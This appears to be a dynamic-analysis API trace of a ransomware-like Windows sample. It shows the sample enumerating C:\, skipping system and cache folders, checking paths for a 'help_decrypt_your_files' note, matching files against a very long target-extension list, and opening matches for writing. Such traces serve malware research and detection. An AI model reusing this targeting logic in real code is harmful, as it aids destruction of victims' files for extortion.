	[0157.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.485] StrStrW (lpFirst="c:\\*.*", lpSrch="webcache") returned 0x0
	[0157.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.485] StrStrW (lpFirst="c:\\*.*", lpSrch="inetcache") returned 0x0
	[0157.485] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.485] StrStrW (lpFirst="c:\\*.*", lpSrch="nvidia") returned 0x0
	[0157.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.486] StrStrW (lpFirst="c:\\*.*", lpSrch="packages") returned 0x0
	[0157.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.487] StrStrW (lpFirst="c:\\*.*", lpSrch="cookies") returned 0x0
	[0157.487] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.487] StrStrW (lpFirst="c:\\*.*", lpSrch="programdata") returned 0x0
	[0157.487] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x18fd04, dwReserved1=0x770b6e36, cFileName="Boot", cAlternateFileName="")) returned 1
	[0157.488] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x18fd04, dwReserved1=0x770b6e36, cFileName="bootmgr", cAlternateFileName="")) returned 1
	[0157.488] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1
	[0157.488] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1
	[0157.488] lstrcpyW (in: lpString1=0x18f234, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.488] lstrcatW (in: lpString1="C:\\", lpString2="bootmgr" | out: lpString1="C:\\bootmgr") returned="C:\\bootmgr"
	[0157.488] lstrlenW (lpString="C:\\bootmgr") returned 10
	[0157.488] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.489] CharLowerBuffW (in: lpsz="C:\\bootmgr", cchLength=0xa | out: lpsz="c:\\bootmgr") returned 0xa
	[0157.489] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.489] StrStrW (lpFirst="c:\\bootmgr", lpSrch="help_decrypt_your_files") returned 0x0
	[0157.489] lstrcpyW (in: lpString1=0x18eddc, lpString2="c:\\bootmgr" | out: lpString1="c:\\bootmgr") returned="c:\\bootmgr"
	[0157.489] lstrlenW (lpString="c:\\bootmgr") returned 10
	[0157.489] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.489] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.490] StrStrW (lpFirst="c:\\bootmgr", lpSrch=".") returned 0x0
	[0157.490] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x18fd04, dwReserved1=0x770b6e36, cFileName="BOOTNXT", cAlternateFileName="")) returned 1
	[0157.490] lstrcmpW (lpString1="BOOTNXT", lpString2="..") returned 1
	[0157.490] lstrcmpW (lpString1="BOOTNXT", lpString2=".") returned 1
	[0157.490] lstrcpyW (in: lpString1=0x18f234, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.490] lstrcatW (in: lpString1="C:\\", lpString2="BOOTNXT" | out: lpString1="C:\\BOOTNXT") returned="C:\\BOOTNXT"
	[0157.490] lstrlenW (lpString="C:\\BOOTNXT") returned 10
	[0157.490] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.491] CharLowerBuffW (in: lpsz="C:\\BOOTNXT", cchLength=0xa | out: lpsz="c:\\bootnxt") returned 0xa
	[0157.491] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.491] StrStrW (lpFirst="c:\\bootnxt", lpSrch="help_decrypt_your_files") returned 0x0
	[0157.491] lstrcpyW (in: lpString1=0x18eddc, lpString2="c:\\bootnxt" | out: lpString1="c:\\bootnxt") returned="c:\\bootnxt"
	[0157.491] lstrlenW (lpString="c:\\bootnxt") returned 10
	[0157.491] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.491] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.492] StrStrW (lpFirst="c:\\bootnxt", lpSrch=".") returned 0x0
	[0157.492] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x18fd04, dwReserved1=0x770b6e36, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1
	[0157.492] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1
	[0157.492] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1
	[0157.492] lstrcpyW (in: lpString1=0x18f234, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.492] lstrcatW (in: lpString1="C:\\", lpString2="BOOTSECT.BAK" | out: lpString1="C:\\BOOTSECT.BAK") returned="C:\\BOOTSECT.BAK"
	[0157.492] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15
	[0157.492] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.493] CharLowerBuffW (in: lpsz="C:\\BOOTSECT.BAK", cchLength=0xf | out: lpsz="c:\\bootsect.bak") returned 0xf
	[0157.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.493] StrStrW (lpFirst="c:\\bootsect.bak", lpSrch="help_decrypt_your_files") returned 0x0
	[0157.493] lstrcpyW (in: lpString1=0x18eddc, lpString2="c:\\bootsect.bak" | out: lpString1="c:\\bootsect.bak") returned="c:\\bootsect.bak"
	[0157.493] lstrlenW (lpString="c:\\bootsect.bak") returned 15
	[0157.493] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.494] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.494] StrStrW (lpFirst=".bak", lpSrch=".") returned=".bak"
	[0157.494] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.494] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bak") returned=".bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0157.494] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.495] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.495] CreateFileW (lpFileName="c:\\bootsect.bak" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0157.496] CloseHandle (hObject=0xffffffff) returned 1
	[0157.496] CloseHandle (hObject=0xffffffff) returned 1
	[0157.496] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1
	[0157.496] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x6b494f65, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1
	[0157.496] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1
	[0157.497] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1
	[0157.497] lstrcpyW (in: lpString1=0x18f234, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.497] lstrcatW (in: lpString1="C:\\", lpString2="hiberfil.sys" | out: lpString1="C:\\hiberfil.sys") returned="C:\\hiberfil.sys"
	[0157.497] lstrlenW (lpString="C:\\hiberfil.sys") returned 15
	[0157.497] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.497] CharLowerBuffW (in: lpsz="C:\\hiberfil.sys", cchLength=0xf | out: lpsz="c:\\hiberfil.sys") returned 0xf
	[0157.497] lstrcpyW (in: lpString1=0x18eddc, lpString2="c:\\hiberfil.sys" | out: lpString1="c:\\hiberfil.sys") returned="c:\\hiberfil.sys"
	[0157.497] lstrlenW (lpString="c:\\hiberfil.sys") returned 15
	[0157.497] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.498] StrStrW (lpFirst=".sys", lpSrch=".") returned=".sys"
	[0157.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.498] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.